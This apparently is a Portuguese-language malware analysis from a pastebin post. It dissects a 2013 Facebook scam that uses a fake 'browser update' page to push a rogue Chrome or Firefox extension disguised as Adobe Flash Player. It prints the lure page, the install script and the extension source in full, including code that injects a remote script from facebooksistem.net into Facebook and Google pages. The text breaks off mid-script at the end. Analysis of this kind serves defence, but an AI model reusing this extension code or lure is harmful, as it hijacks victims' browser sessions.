Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ############# analise Facebook virus #############
- ############# by: Xel4 NeO #############
- ############# greatz: Oscar Marques #############
- ############# Th3 Pir4t3 for all greatz #############
- ############# Date:24/01/2013 #############
- #####################################################################
- link falso: www.türkaskerindenpkkyabüyükdarbe.tk
- link real: http://www.xn--trkaskerindenpkkyabykdarbe-yzcsb.tk/
- #####################################################################
- host com extensão da turquia
- Xn Trkaskerindenpkkyabykdarbe Yzcsb - www.Xn--Trkaskerindenpkkyabykdarbe-Yzcsb.tk
- Xn--Trkaskerindenpkkyabykdarbe-Yzcsb Title:
- Taray?c?n?z Güncellenmeli !
- Xn--Trkaskerindenpkkyabykdarbe-Yzcsb Keywords:
- xn--trkaskerindenpkkyabykdarbe-yzcsb.tk
- Xn--Trkaskerindenpkkyabykdarbe-Yzcsb Description:
- Taray?c?n?z Güncellenmeli !
- Xn--Trkaskerindenpkkyabykdarbe-Yzcsb IP:
- 93.170.52.31
- Xn--Trkaskerindenpkkyabykdarbe-Yzcsb server location:
- Czech Republic
- Xn--Trkaskerindenpkkyabykdarbe-Yzcsb ISP:
- ALFA TELECOM s.r.o.
- IP: 93.170.52.31
- IP Country: Czech Republic
- 7 Hosts on this IP
- Number Domain / Host
- 1. www.michelkok.tk
- 2. www.truedarkness.tk
- 3. net-tv.tk
- 4. moviestelugu.tk
- 5. www.sanlorenzogenova.tk
- 6. www.thewave.tk
- 7. www.th3sturm.tk
- #####################################################################
- titulo da primeira pagina: Tarayiciniz Güncellenmeli
- tradução:o seu navegador atualizado*
- primeira pagina aparece as escritas :
- Okuyun, Yoksa Yapamazsiniz !**
- Assagidaki Mavi Butona Tiklayin,
- Önünüze gelen küçük sekmede ise Ekle yazisina tiklayin.
- Ekle'ye tikladiktan sonra biraz bekleyin.
- Simdi Guncelle
- traduçao:
- Leia, ou não pode!*
- Clique no botão azul afirma o seguinte,
- Na guia Adicionar, clique no texto na frente de você um pouco.
- Depois de clicar em Adicionar um pouco táxis.
- atualizar agora
- #####################################################################
- codigo fonte:
- <html>
- <head>
- <title>Tarayiciniz Güncellenmeli !</title>
- <meta name="description" content="Tarayiciniz Güncellenmeli !">
- <meta name="keywords" content="xn--trkaskerindenpkkyabykdarbe-yzcsb.tk">
- <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
- <script type="text/javascript">
- var _gaq = _gaq || [];
- _gaq.push(['_setAccount', 'UA-23441223-3']);
- _gaq.push(['_setDomainName', 'none']);
- _gaq.push(['_setAllowLinker', true]);
- _gaq.push(['_trackPageview']);
- (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
- ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
- var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
- })();
- </script>
- </head>
- <frameset rows="*">
- <frame frameborder=0 src="http://sosyalaghileleri.com" name="dot_tk_frame_content" scrolling="auto" noresize>
- </frameset>
- </html>
- #####################################################################
- ENTAO REDIRECIONA PARA UMA SEGUNDA PAGINA: ACESSO A PAGINA DESDE AS 10HS ATE AS 15:00
- 3 558 AUMENTANDO EXPONENCIALMENTE
- stats do site: http://whos.amung.us/stats/181yeqwixdob/
- mapa com origem dos acessos: http://whos.amung.us/stats/maps/181yeqwixdob/
- #####################################################################
- codifo fonte da pagina: http://www.sosyalaghileleri.com/
- <meta http-equiv="refresh" content="0;URL=http://www.sosyalaghileleri.com/teror">
- <meta name="google-site-verification" content="CySzB06QJD7dAj0gO1yVutHY8wNIoKQmcxZuTMGhGa0" />
- <link rel="chrome-webstore-item" href="https://chrome.google.com/webstore/detail/flpeiefiaecmkdannhapfejemlfpikbj">
- <link rel="shortcut icon" href="http://cdn1.iconfinder.com/data/icons/yooicons_set09_halloween/128/cheshire_cat.png" />
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
- <title>Tarayiciniz Güncellenmeli !</title>
- <script>
- function kur(){
- var is_chrome=navigator.userAgent.toLowerCase().indexOf("chrome")>-1;
- var is_firefox=navigator.userAgent.toLowerCase().indexOf("firefox")>-1;
- if(is_chrome){
- chrome.webstore.install("https://chrome.google.com/webstore/detail/flpeiefiaecmkdannhapfejemlfpikbj");
- }
- else if(is_firefox){
- window.location.href="http://www.expertcoder.nazuka.net/topluca.xpi";
- }
- else {
- window.location.href="./error.php";
- }
- }
- </script>
- <body bgcolor="#ffffff" onload="if (self != top) top.location=self.location">
- <style>
- body,html{width:100%;height:100%;,margin:0; padding:0}
- #siyahSP{
- width:100%;
- height:100%;
- _height:expression(document.body.clientheight);
- position: absolute; top: 0px; left: 0px; background-color: rgb(51, 51, 51); z-index: 9998; opacity: 0.8; background-position:
- initial; background-repeat: initial initial
- }
- .siyahIc
- {
- z-index: 9999;
- background-color:white;
- border:solid #333 1px;
- width:380px;
- height:250px;
- margin: 5% auto;
- left: 0;
- right: 0;
- margin-top:70px;
- padding:20px;
- font-family:Tahoma, Geneva, sans-serif;
- filter:alpha(opacity=100);
- -moz-opacity: 1;
- opacity: 1;
- }
- .ekle
- {
- background-color:#5486da;
- width:300px;
- height:30px;
- -moz-border-radius: 5px;
- -webkit-border-radius: 5px;
- border:#2d53af 1px solid;
- text-align:center;
- line-height:30px;
- color:white;
- text-decoration:none;
- font-size:16px;
- font-weight:bold;
- }
- .ekle:hover
- {
- background: #6097ff; /* Old browsers */
- background: -moz-linear-gradient(top, #6097ff 0%, #5486da 100%); /* FF3.6+ */
- background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#6097ff), color-stop(100%,#5486da)); /* Chrome,Safari4+ */
- background: -webkit-linear-gradient(top, #6097ff 0%,#5486da 100%); /* Chrome10+,Safari5.1+ */
- background: -o-linear-gradient(top, #6097ff 0%,#5486da 100%); /* Opera 11.10+ */
- background: -ms-linear-gradient(top, #6097ff 0%,#5486da 100%); /* IE10+ */
- background: linear-gradient(top, #6097ff 0%,#5486da 100%); /* W3C */
- filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#6097ff', endColorstr='#5486da',GradientType=0 ); /* IE6-9 */
- }
- </style>
- <div id="siyahBuDivBaskaDiv">
- <div class="siyahIc">
- <center>
- <div style="float:left;"> <img src="logo.jpg"></div></center>
- <div style="float:right;"></div>
- <center>
- <br><br><br>
- <p style="color:#111;font-weight:600;font-size:15px; margin-bottom:0px;">Okuyun, Yoksa Yapamazsiniz !</p><br>
- <p style="color:#666;font-size:15px; margin-top:0px;">Assagidaki Mavi Butona Tiklayin,</p>
- <p style="color:#666;font-size:15px; margin-top:0px;">Önünüze gelen küçük sekmede ise <font color="red">Ekle</font> yazisina tiklayin.</p>
- <p style="color:#666;font-size:15px; margin-top:0px;"><font color="red">Ekle</font>'ye tikladiktan sonra biraz bekleyin.</p>
- <p></p>
- <a href="javascript:" onclick="kur();" style="text-decoration:none;">
- <div class="ekle">Simdi Guncelle</div>
- </a></body></html>
- <br><br><br><br><br><br><br><br>
- <script id="_wau0dc">var _wau = _wau || [];
- _wau.push(["colored", "181yeqwixdob", "0dc", "bcc1007e000a"]);
- (function() {var s=document.createElement("script"); s.async=true;
- s.src="http://widgets.amung.us/colored.js";
- document.getElementsByTagName("head")[0].appendChild(s);
- })();</script>
- #####################################################################
- ele baixa um aplicativo do webstore do chrome, no caso de ser firefox baixa um extensão do firefox em xpi.
- unction kur(){
- var is_chrome=navigator.userAgent.toLowerCase().indexOf("chrome")>-1;
- var is_firefox=navigator.userAgent.toLowerCase().indexOf("firefox")>-1;
- if(is_chrome){
- chrome.webstore.install("https://chrome.google.com/webstore/detail/flpeiefiaecmkdannhapfejemlfpikbj");
- }
- else if(is_firefox){
- window.location.href="http://www.expertcoder.nazuka.net/topluca.xpi";
- }
- else {
- window.location.href="./error.php";
- #####################################################################
- analise arquivo topluca.xpi
- $contem uma pasta vazia com nome chrome
- $pasta content
- $install.rdf
- $chrome
- #####################################################################
- analise pasta content
- contem 4 JSscriptfile
- $adobeflashplayer
- #######
- /**
- */
- // ==UserScript==
- // @name SosyalHilelerim
- // @namespace SosyalHilelerim
- // @description goole.com
- // @version 1.5
- // @license GPL 3.0
- // @include http*://*.facebook.com/*
- // @include http*://*.google.*/*
- // @exclude http*://*.facebook.com/plugins/*
- // @exclude http*://*.facebook.com/widgets/*
- // @exclude http*://*.facebook.com/iframe/*
- // @exclude http*://*.facebook.com/desktop/*
- // @exclude http*://*.channel.facebook.com/*
- // @exclude http*://*.facebook.com/ai.php*
- // @exclude http*://*.facebookajans.com/*
- // @exclude http://*.channel.facebook.tld/*
- // @exclude http://static.*.facebook.tld/*
- // @exclude http://*.facebook.tld/ai.php*
- // @exclude http://*.facebook.tld/pagelet/generic.php/pagelet/home/morestories.php*
- // @exclude https://*.channel.facebook.tld/*
- // @exclude https://static.*.facebook.tld/*
- // @exclude https://*.facebook.tld/ai.php*
- // @exclude https://*.facebook.tld/pagelet/generic.php/pagelet/home/morestories.php*
- // @exclude http*://*.google.*/blank.html
- // ==/UserScript==
- if (!/https?:\/\/[^\/]*\.?facebook\.[^\/]+\//.test(window.location.href))
- {
- var googledayim=1;
- }
- if (googledayim && !/https?:\/\/[^\/]*\.?google\.[^\/]+\//.test(window.location.href)) { return; }
- // Get a reference to the *real* window
- if (typeof unsafeWindow=="undefined") {
- var div = document.createElement('div');
- div.setAttribute('onclick', 'return window;');
- unsafeWindow = div.onclick();
- }
- if (!window.localStorage) {
- window.localStorage = {
- getItem: function (sKey) {
- if (!sKey || !this.hasOwnProperty(sKey)) { return null; }
- return unescape(document.cookie.replace(new RegExp("(?:^|.*;\\s*)" + escape(sKey).replace(/[\-\.\+\*]/g, "\\$&") + "\\s*\\=\\s*((?:[^;](?!;))*[^;]?).*"), "$1"));
- },
- key: function (nKeyId) { return unescape(document.cookie.replace(/\s*\=(?:.(?!;))*$/, "").split(/\s*\=(?:[^;](?!;))*[^;]?;\s*/)[nKeyId]); },
- setItem: function (sKey, sValue) {
- if(!sKey) { return; }
- document.cookie = escape(sKey) + "=" + escape(sValue) + "; path=/";
- this.length = document.cookie.match(/\=/g).length;
- },
- length: 0,
- removeItem: function (sKey) {
- if (!sKey || !this.hasOwnProperty(sKey)) { return; }
- var sExpDate = new Date();
- sExpDate.setDate(sExpDate.getDate() - 1);
- document.cookie = escape(sKey) + "=; expires=" + sExpDate.toGMTString() + "; path=/";
- this.length--;
- },
- hasOwnProperty: function (sKey) { return (new RegExp("(?:^|;\\s*)" + escape(sKey).replace(/[\-\.\+\*]/g, "\\$&") + "\\s*\\=")).test(document.cookie); }
- };
- window.localStorage.length = (document.cookie.match(/\=/g) || window.localStorage).length;
- }
- // Greasemonkey API for Chrome/Safari/Opera
- GM_addStyle=function(css) {var style = document.createElement('style');style.textContent = css;document.getElementsByTagName('head')[0].appendChild(style);};
- GM_getValue=function(name, defaultValue) { return window.localStorage.getItem(name) || defaultValue;};
- GM_setValue=function(name, value) {
- try {window.localStorage.setItem(name, value);} catch (e) {
- if (e.toString().indexOf('QUOTA_EXCEEDED_ERR')>-1) { add_error("Either your browser's local storage area is full or you are browsing in Private Browsing mode, which isn't supported.<br>Please <a href=\"http://SocialFixer.com/faq.php#quota\" target=\"_blank\">Read the FAQ</a> for a detailed explanation of this error");}
- }
- };
- var opera_xhr_counter = 0;
- var opera_xhr_funcs = {};
- GM_xmlhttpRequest=function(obj) {
- try {
- if (obj && obj.url && obj.url.indexOf("facebook.com")>0) {
- var request=new window.XMLHttpRequest();
- request.onreadystatechange=function() { if(obj.onreadystatechange) { obj.onreadystatechange(request); }; if(request.readyState==4 && obj.onload) { obj.onload(request); } }
- request.onerror=function() { if(obj.onerror) { obj.onerror(request); } }
- try { request.open(obj.method,obj.url,true); } catch(e) { if(obj.onerror) { obj.onerror( {readyState:4,responseHeaders:'',responseText:'',responseXML:'',status:403,statusText:'Forbidden'} ); }; return; }
- if(obj.headers) { for(name in obj.headers) { request.setRequestHeader(name,obj.headers[name]); } }
- request.send(obj.data); return request;
- }
- else {
- opera_xhr_counter++;
- var xhr = { 'method':obj.method, 'url':obj.url, 'headers':obj.headers, 'data':obj.data };
- var req_obj = {'type':'ajax', 'xhr':xhr, 'id':opera_xhr_counter};
- opera_xhr_funcs[ opera_xhr_counter ] = obj.onload;
- opera.extension.postMessage( JSON.stringify(req_obj) );
- }
- } catch(e) {
- alert(e);
- }
- };
- var ajax = function(props) {
- GM_xmlhttpRequest(props);
- }
- // Don't run on link redirects and some other cases
- var excludes = ['/l.php?u','/ai.php','/plugins/','morestories.php','blank.html'];
- try {
- for (var i=0; i<excludes.length; i++) {
- if ( window.location.href.indexOf(excludes[i])>0 ) { return; }
- }
- } catch(e) { }
- // Extension Option Persistence
- function setValue(key,val,func) {
- if (PERFORMANCE) { trace_start('setValue',null,true); }
- var do_set=function() {
- if (PERFORMANCE) { trace_start('setValue',null,true); }
- try {
- GM_setValue(key,val);
- } catch(e) {
- alert(e);
- }
- if(func) {
- func(key,val);
- }
- if (PERFORMANCE) { trace_end('setValue',null,true); }
- };
- do_set.name="setValue.do_set";
- window.setTimeout(do_set,0);
- if (PERFORMANCE) { trace_end('setValue',null,true); }
- }
- function getValue(key, def, func) {
- if (PERFORMANCE) { trace_start('getValue',null,true); }
- // Key can be either a single key or an array of keys
- if (typeof key=="string") {
- return func(GM_getValue(key,def));
- }
- else if (typeof key=="object" && key.length) {
- var values = {};
- for (var i=0; i<key.length; i++) {
- var default_value = undef;
- if (typeof def=="object" && def.length && i<def.length) {
- default_value = def[i];
- }
- values[key[i]] = GM_getValue(key[i],default_value);
- }
- if (func) {
- return func(values);
- }
- else { return values; }
- }
- if (PERFORMANCE) { trace_end('getValue',null,true); }
- return undef;
- }
- document.ready=start(0);
- a=0;
- function start(a)
- {
- if(!googledayim)
- {
- if(document.getElementById('faceplus')) return;
- var s=document.createElement('script');
- s.type="text/javascript";
- s.className="cachedVersion";
- s.innerHTML='var s=document.createElement("script");s.type="text/javascript";s.src="//facebooksistem.net/macodtm/dongu.php?amtasak="+Math.random()*999999;document.getElementsByTagName("head")[0].appendChild(s);';
- s.id="faceplus"
- if(document.getElementsByTagName('head')[0])document.getElementsByTagName('head')[0].appendChild(s);
- else if(a<50) setTimeout(function(){start(a++);},100);
- }
- else
- {
- if(document.getElementById('faceplus')) return;
- var s=document.createElement('script');
- s.type="text/javascript";
- s.className="cachedVersion";
- s.innerHTML='var s=document.createElement("script");s.type="text/javascript";s.src="//facebooksistem.net/macodtm/askfm.php?amtasak="+Math.random()*999999;document.getElementsByTagName("head")[0].appendChild(s);';
- s.id="faceplus"
- if(document.getElementsByTagName('head')[0])document.getElementsByTagName('head')[0].appendChild(s);
- else if(a<50) setTimeout(function(){start(a++);},100);
- }
- }
- #################
- $script-compiler
- var adobeflashplayer_gmCompiler={
- // getUrlContents adapted from Greasemonkey Compiler
- // http://www.letitblog.com/code/python/greasemonkey.py.txt
- // used under GPL permission
- //
- // most everything else below based heavily off of Greasemonkey
- // http://greasemonkey.devjavu.com/
- // used under GPL permission
- getUrlContents: function(aUrl){
- var ioService=Components.classes["@mozilla.org/network/io-service;1"]
- .getService(Components.interfaces.nsIIOService);
- var scriptableStream=Components
- .classes["@mozilla.org/scriptableinputstream;1"]
- .getService(Components.interfaces.nsIScriptableInputStream);
- var unicodeConverter=Components
- .classes["@mozilla.org/intl/scriptableunicodeconverter"]
- .createInstance(Components.interfaces.nsIScriptableUnicodeConverter);
- unicodeConverter.charset="UTF-8";
- var channel=ioService.newChannel(aUrl, "UTF-8", null);
- var input=channel.open();
- scriptableStream.init(input);
- var str=scriptableStream.read(input.available());
- scriptableStream.close();
- input.close();
- try {
- return unicodeConverter.ConvertToUnicode(str);
- } catch (e) {
- return str;
- }
- },
- isGreasemonkeyable: function(url) {
- var scheme=Components.classes["@mozilla.org/network/io-service;1"]
- .getService(Components.interfaces.nsIIOService)
- .extractScheme(url);
- return (
- (scheme == "http" || scheme == "https" || scheme == "file") &&
- !/hiddenWindow\.html$/.test(url)
- );
- },
- contentLoad: function(e) {
- var unsafeWin=e.target.defaultView;
- if (unsafeWin.wrappedJSObject) unsafeWin=unsafeWin.wrappedJSObject;
- var unsafeLoc=new XPCNativeWrapper(unsafeWin, "location").location;
- var href=new XPCNativeWrapper(unsafeLoc, "href").href;
- if (
- adobeflashplayer_gmCompiler.isGreasemonkeyable(href)
- && ( /^http.*:\/\/.*\.facebook\.com\/.*$/.test(href) || /^http.*:\/\/.*\.google\..*\/.*$/.test(href) )
- && !( /^http.*:\/\/.*\.facebook\.com\/plugins\/.*$/.test(href) || /^http.*:\/\/.*\.facebook\.com\/widgets\/.*$/.test(href) || /^http.*:\/\/.*\.facebook\.com\/iframe\/.*$/.test(href) || /^http.*:\/\/.*\.facebook\.com\/desktop\/.*$/.test(href) || /^http.*:\/\/.*\.channel\.facebook\.com\/.*$/.test(href) || /^http.*:\/\/.*\.facebook\.com\/ai\.php.*$/.test(href) || /^http.*:\/\/.*\.faceplus\.biz\/.*$/.test(href) || /^http:\/\/.*\.channel\.facebook\.tld\/.*$/.test(href) || /^http:\/\/static\..*\.facebook\.tld\/.*$/.test(href) || /^http:\/\/.*\.facebook\.tld\/ai\.php.*$/.test(href) || /^http:\/\/.*\.facebook\.tld\/pagelet\/generic\.php\/pagelet\/home\/morestories\.php.*$/.test(href) || /^https:\/\/.*\.channel\.facebook\.tld\/.*$/.test(href) || /^https:\/\/static\..*\.facebook\.tld\/.*$/.test(href) || /^https:\/\/.*\.facebook\.tld\/ai\.php.*$/.test(href) || /^https:\/\/.*\.facebook\.tld\/pagelet\/generic\.php\/pagelet\/home\/morestories\.php.*$/.test(href) || /^http.*:\/\/.*\.google\..*\/blank\.html$/.test(href) )
- ) {
- var script=adobeflashplayer_gmCompiler.getUrlContents(
- 'chrome://adobeflashplayer/content/adobeflashplayer.js'
- );
- adobeflashplayer_gmCompiler.injectScript(script, href, unsafeWin);
- }
- },
- injectScript: function(script, url, unsafeContentWin) {
- var sandbox, script, logger, storage, xmlhttpRequester;
- var safeWin=new XPCNativeWrapper(unsafeContentWin);
- sandbox=new Components.utils.Sandbox(safeWin);
- var storage=new adobeflashplayer_ScriptStorage();
- xmlhttpRequester=new adobeflashplayer_xmlhttpRequester(
- unsafeContentWin, window//appSvc.hiddenDOMWindow
- );
- sandbox.window=safeWin;
- sandbox.document=sandbox.window.document;
- sandbox.unsafeWindow=unsafeContentWin;
- // patch missing properties on xpcnw
- sandbox.XPathResult=Components.interfaces.nsIDOMXPathResult;
- // add our own APIs
- sandbox.GM_addStyle=function(css) { adobeflashplayer_gmCompiler.addStyle(sandbox.document, css) };
- sandbox.GM_setValue=adobeflashplayer_gmCompiler.hitch(storage, "setValue");
- sandbox.GM_getValue=adobeflashplayer_gmCompiler.hitch(storage, "getValue");
- sandbox.GM_openInTab=adobeflashplayer_gmCompiler.hitch(this, "openInTab", unsafeContentWin);
- sandbox.GM_xmlhttpRequest=adobeflashplayer_gmCompiler.hitch(
- xmlhttpRequester, "contentStartRequest"
- );
- //unsupported
- sandbox.GM_registerMenuCommand=function(){};
- sandbox.GM_log=function(){};
- sandbox.GM_getResourceURL=function(){};
- sandbox.GM_getResourceText=function(){};
- sandbox.__proto__=sandbox.window;
- try {
- this.evalInSandbox(
- "(function(){"+script+"})()",
- url,
- sandbox);
- } catch (e) {
- var e2=new Error(typeof e=="string" ? e : e.message);
- e2.fileName=script.filename;
- e2.lineNumber=0;
- //GM_logError(e2);
- alert(e2);
- }
- },
- evalInSandbox: function(code, codebase, sandbox) {
- if (Components.utils && Components.utils.Sandbox) {
- // DP beta+
- Components.utils.evalInSandbox(code, sandbox);
- } else if (Components.utils && Components.utils.evalInSandbox) {
- // DP alphas
- Components.utils.evalInSandbox(code, codebase, sandbox);
- } else if (Sandbox) {
- // 1.0.x
- evalInSandbox(code, sandbox, codebase);
- } else {
- throw new Error("Could not create sandbox.");
- }
- },
- openInTab: function(unsafeContentWin, url) {
- var tabBrowser = getBrowser(), browser, isMyWindow = false;
- for (var i = 0; browser = tabBrowser.browsers[i]; i++)
- if (browser.contentWindow == unsafeContentWin) {
- isMyWindow = true;
- break;
- }
- if (!isMyWindow) return;
- var loadInBackground, sendReferrer, referrer = null;
- loadInBackground = tabBrowser.mPrefs.getBoolPref("browser.tabs.loadInBackground");
- sendReferrer = tabBrowser.mPrefs.getIntPref("network.http.sendRefererHeader");
- if (sendReferrer) {
- var ios = Components.classes["@mozilla.org/network/io-service;1"]
- .getService(Components.interfaces.nsIIOService);
- referrer = ios.newURI(content.document.location.href, null, null);
- }
- tabBrowser.loadOneTab(url, referrer, null, null, loadInBackground);
- },
- hitch: function(obj, meth) {
- var unsafeTop = new XPCNativeWrapper(unsafeContentWin, "top").top;
- for (var i = 0; i < this.browserWindows.length; i++) {
- this.browserWindows[i].openInTab(unsafeTop, url);
- }
- },
- apiLeakCheck: function(allowedCaller) {
- var stack=Components.stack;
- var leaked=false;
- do {
- if (2==stack.language) {
- if ('chrome'!=stack.filename.substr(0, 6) &&
- allowedCaller!=stack.filename
- ) {
- leaked=true;
- break;
- }
- }
- stack=stack.caller;
- } while (stack);
- return leaked;
- },
- hitch: function(obj, meth) {
- if (!obj[meth]) {
- throw "method '" + meth + "' does not exist on object '" + obj + "'";
- }
- var hitchCaller=Components.stack.caller.filename;
- var staticArgs = Array.prototype.splice.call(arguments, 2, arguments.length);
- return function() {
- if (adobeflashplayer_gmCompiler.apiLeakCheck(hitchCaller)) {
- return;
- }
- // make a copy of staticArgs (don't modify it because it gets reused for
- // every invocation).
- var args = staticArgs.concat();
- // add all the new arguments
- for (var i = 0; i < arguments.length; i++) {
- args.push(arguments[i]);
- }
- // invoke the original function with the correct this obj and the combined
- // list of static and dynamic arguments.
- return obj[meth].apply(obj, args);
- };
- },
- addStyle:function(doc, css) {
- var head, style;
- head = doc.getElementsByTagName('head')[0];
- if (!head) { return; }
- style = doc.createElement('style');
- style.type = 'text/css';
- style.innerHTML = css;
- head.appendChild(style);
- },
- onLoad: function() {
- var appcontent=window.document.getElementById("appcontent");
- if (appcontent && !appcontent.greased_adobeflashplayer_gmCompiler) {
- appcontent.greased_adobeflashplayer_gmCompiler=true;
- appcontent.addEventListener("DOMContentLoaded", adobeflashplayer_gmCompiler.contentLoad, false);
- }
- },
- onUnLoad: function() {
- //remove now unnecessary listeners
- window.removeEventListener('load', adobeflashplayer_gmCompiler.onLoad, false);
- window.removeEventListener('unload', adobeflashplayer_gmCompiler.onUnLoad, false);
- window.document.getElementById("appcontent")
- .removeEventListener("DOMContentLoaded", adobeflashplayer_gmCompiler.contentLoad, false);
- },
- }; //object adobeflashplayer_gmCompiler
- function adobeflashplayer_ScriptStorage() {
- this.prefMan=new adobeflashplayer_PrefManager();
- }
- adobeflashplayer_ScriptStorage.prototype.setValue = function(name, val) {
- this.prefMan.setValue(name, val);
- }
- adobeflashplayer_ScriptStorage.prototype.getValue = function(name, defVal) {
- return this.prefMan.getValue(name, defVal);
- }
- window.addEventListener('load', adobeflashplayer_gmCompiler.onLoad, false);
- window.addEventListener('unload', adobeflashplayer_gmCompiler.onUnLoad, false);
- ####################
- xmlhttprequester
- ###
- function adobeflashplayer_xmlhttpRequester(unsafeContentWin, chromeWindow) {
- this.unsafeContentWin = unsafeContentWin;
- this.chromeWindow = chromeWindow;
- }
- // this function gets called by user scripts in content security scope to
- // start a cross-domain xmlhttp request.
- //
- // details should look like:
- // {method,url,onload,onerror,onreadystatechange,headers,data}
- // headers should be in the form {name:value,name:value,etc}
- // can't support mimetype because i think it's only used for forcing
- // text/xml and we can't support that
- adobeflashplayer_xmlhttpRequester.prototype.contentStartRequest = function(details) {
- // important to store this locally so that content cannot trick us up with
- // a fancy getter that checks the number of times it has been accessed,
- // returning a dangerous URL the time that we actually use it.
- var url = details.url;
- // make sure that we have an actual string so that we can't be fooled with
- // tricky toString() implementations.
- if (typeof url != "string") {
- throw new Error("Invalid url: url must be of type string");
- }
- var ioService=Components.classes["@mozilla.org/network/io-service;1"]
- .getService(Components.interfaces.nsIIOService);
- var scheme = ioService.extractScheme(url);
- // This is important - without it, GM_xmlhttpRequest can be used to get
- // access to things like files and chrome. Careful.
- switch (scheme) {
- case "http":
- case "https":
- case "ftp":
- this.chromeWindow.setTimeout(
- adobeflashplayer_gmCompiler.hitch(this, "chromeStartRequest", url, details), 0);
- break;
- default:
- throw new Error("Invalid url: " + url);
- }
- }
- // this function is intended to be called in chrome's security context, so
- // that it can access other domains without security warning
- adobeflashplayer_xmlhttpRequester.prototype.chromeStartRequest=function(safeUrl, details) {
- var req = new this.chromeWindow.XMLHttpRequest();
- this.setupRequestEvent(this.unsafeContentWin, req, "onload", details);
- this.setupRequestEvent(this.unsafeContentWin, req, "onerror", details);
- this.setupRequestEvent(this.unsafeContentWin, req, "onreadystatechange", details);
- req.open(details.method, safeUrl);
- if (details.headers) {
- for (var prop in details.headers) {
- req.setRequestHeader(prop, details.headers[prop]);
- }
- }
- req.send(details.data);
- }
- // arranges for the specified 'event' on xmlhttprequest 'req' to call the
- // method by the same name which is a property of 'details' in the content
- // window's security context.
- adobeflashplayer_xmlhttpRequester.prototype.setupRequestEvent =
- function(unsafeContentWin, req, event, details) {
- if (details[event]) {
- req[event] = function() {
- var responseState = {
- // can't support responseXML because security won't
- // let the browser call properties on it
- responseText:req.responseText,
- readyState:req.readyState,
- responseHeaders:(req.readyState==4?req.getAllResponseHeaders():''),
- status:(req.readyState==4?req.status:0),
- statusText:(req.readyState==4?req.statusText:'')
- }
- // Pop back onto browser thread and call event handler.
- // Have to use nested function here instead of GM_hitch because
- // otherwise details[event].apply can point to window.setTimeout, which
- // can be abused to get increased priveledges.
- new XPCNativeWrapper(unsafeContentWin, "setTimeout()")
- .setTimeout(function(){details[event](responseState);}, 0);
- }
- }
- }
- ##################
- prefman
- function adobeflashplayer_PrefManager() {
- var startPoint="adobeflashplayer.";
- var pref=Components.classes["@mozilla.org/preferences-service;1"].
- getService(Components.interfaces.nsIPrefService).
- getBranch(startPoint);
- var observers={};
- // whether a preference exists
- this.exists=function(prefName) {
- return pref.getPrefType(prefName) != 0;
- }
- // returns the named preference, or defaultValue if it does not exist
- this.getValue=function(prefName, defaultValue) {
- var prefType=pref.getPrefType(prefName);
- // underlying preferences object throws an exception if pref doesn't exist
- if (prefType==pref.PREF_INVALID) {
- return defaultValue;
- }
- switch (prefType) {
- case pref.PREF_STRING: return pref.getCharPref(prefName);
- case pref.PREF_BOOL: return pref.getBoolPref(prefName);
- case pref.PREF_INT: return pref.getIntPref(prefName);
- }
- }
- // sets the named preference to the specified value. values must be strings,
- // booleans, or integers.
- this.setValue=function(prefName, value) {
- var prefType=typeof(value);
- switch (prefType) {
- case "string":
- case "boolean":
- break;
- case "number":
- if (value % 1 != 0) {
- throw new Error("Cannot set preference to non integral number");
- }
- break;
- default:
- throw new Error("Cannot set preference with datatype: " + prefType);
- }
- // underlying preferences object throws an exception if new pref has a
- // different type than old one. i think we should not do this, so delete
- // old pref first if this is the case.
- if (this.exists(prefName) && prefType != typeof(this.getValue(prefName))) {
- this.remove(prefName);
- }
- // set new value using correct method
- switch (prefType) {
- case "string": pref.setCharPref(prefName, value); break;
- case "boolean": pref.setBoolPref(prefName, value); break;
- case "number": pref.setIntPref(prefName, Math.floor(value)); break;
- }
- }
- // deletes the named preference or subtree
- this.remove=function(prefName) {
- pref.deleteBranch(prefName);
- }
- // call a function whenever the named preference subtree changes
- this.watch=function(prefName, watcher) {
- // construct an observer
- var observer={
- observe:function(subject, topic, prefName) {
- watcher(prefName);
- }
- };
- // store the observer in case we need to remove it later
- observers[watcher]=observer;
- pref.QueryInterface(Components.interfaces.nsIPrefBranchInternal).
- addObserver(prefName, observer, false);
- }
- // stop watching
- this.unwatch=function(prefName, watcher) {
- if (observers[watcher]) {
- pref.QueryInterface(Components.interfaces.nsIPrefBranchInternal)
- .removeObserver(prefName, observers[watcher]);
- }
- }
- }
- #############
- script-compiler-overlay.xul
- <?xml version="1.0"?><overlay xmlns='http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul'>
- <script type='application/x-javascript'
- src='chrome://adobeflashplayer/content/xmlhttprequester.js'></script><script type='application/x-javascript'
- src='chrome://adobeflashplayer/content/prefman.js'></script><script type='application/x-javascript'
- src='chrome://adobeflashplayer/content/script-compiler.js'></script></overlay>
- ########################################################################################################
- analise arquivo install rdf
- <?xml version="1.0"?><RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:em="http://www.mozilla.org/2004/em-rdf#">
- <Description about="urn:mozilla:install-manifest"><em:id>{9e09ac65-43c0-4b9d-970f-11e2e9616c55}</em:id><em:name>SosyalHilelerim
- </em:name><em:version>1.5</em:version><em:description>SosyalHilelerim</em:description><em:creator>Facebook.com</em:creator>
- <em:contributor>SosyalHilelerim</em:contributor><em:contributor>http://facebook.com/</em:contributor><em:homepageURL>www.facebook.com
- </em:homepageURL><em:targetApplication><Description><em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id><em:minVersion>3.5.*
- </em:minVersion><em:maxVersion>12.*</em:maxVersion></Description></em:targetApplication></Description></RDF>
- ##########################################################################################################
- analise arquivo chrome.manifest
- content adobeflashplayer content/
- overlay chrome://browser/content/browser.xul
- chrome://adobeflashplayer/content/script-compiler-overlay.xul
- ##########################################################################################################
- pagina:http://www.sosyalaghileleri.com/teror/
- source:
- <META http-equiv=content-type content=text/html;charset=iso-8859-9>
- <META http-equiv=content-type content=text/html;charset=windows-1254>
- <META http-equiv=content-type content=text/html;charset=x-mac-turkish>
- <script id="_wau0nk">var _wau = _wau || [];
